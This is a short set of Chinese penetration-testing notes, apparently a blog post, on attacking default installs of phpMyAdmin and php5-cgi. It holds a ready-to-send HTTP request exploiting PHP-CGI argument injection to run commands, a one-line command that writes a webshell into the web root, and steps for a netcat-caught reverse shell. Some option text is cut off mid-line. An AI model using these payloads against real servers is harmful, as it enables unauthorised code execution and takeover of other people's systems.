默認安裝漏洞
phpmyadmin/setup默認安裝
ubuntu/debian默認安裝php5-cgi
phpmyadmin/setup默認安裝
使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1對php.ini文件做試探)
POSThttp://192.168.1.12/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.1.12
Content-Length: 34
<?php
passthru('id'); ##使用passthru函數,執行命令,比如ls,cat等,如果可以執行,也可以寫一句話木馬進去
die(); ##die函數,不執行以下的操作
?>
點擊那個筆,把設置好對應的端口
點擊go,帳號就顯示出來了(www權限)
pwd命令
寫入網頁木馬
echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/xxsec.php
寫好木馬后即可執行命令
反彈shell
把php-reverse-shell.php拷貝到其他目錄,然后編輯它,把ip地址變成攻擊機
編輯后保存,把內容發送到目標機器上(因為它是反彈鏈接,所以發送前,先用nc監聽好端口)
我反彈shell上的反彈的1234端口,用nc監聽1234端口,發送后就會反彈到nc會話
ubuntu/debian默認安裝php5-cgi,可以直接訪問/cgi-bin/php5和cgi-bin/php(這個目錄是爬不出來的)
-d allow_url_in clude=on -d safe_mode= off -d suhosin.simul ation=on -d disa
把這些代碼復制到burp編碼為url,否則執行不了,
這里的host主機頭必須有,使用system函數執行命令<?php echo system('id'); die(); ?>
查看所有用戶信息
也可以讓主機監聽一個端口,我們用nc連接這個端口,但是可能會被防火牆攔
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn